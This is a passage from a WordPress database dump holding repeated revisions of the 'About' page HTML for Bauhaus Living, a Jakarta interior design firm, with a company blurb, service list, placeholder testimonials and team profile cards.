src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								REDESIGN LIFE							</h2>\n		<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:20:09','2023-09-22 08:20:09','',38,'https://bauhaus.futuremediatrix.com/?p=4838',0,'revision','',0),(4839,3,'2023-09-22 08:29:50','2023-09-22 08:29:50','','john_allan','','inherit','open','closed','','john_allan','','','2023-09-22 08:29:50','2023-09-22 08:29:50','',38,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg',0,'attachment','image/jpeg',0),(4840,3,'2023-09-22 08:30:23','2023-09-22 08:30:23','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								REDESIGN LIFE							</h2>\n		<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:30:23','2023-09-22 08:30:23','',38,'https://bauhaus.futuremediatrix.com/?p=4840',0,'revision','',0),(4841,3,'2023-09-22 08:30:23','2023-09-22 08:30:23','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								REDESIGN LIFE							</h2>\n		<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown					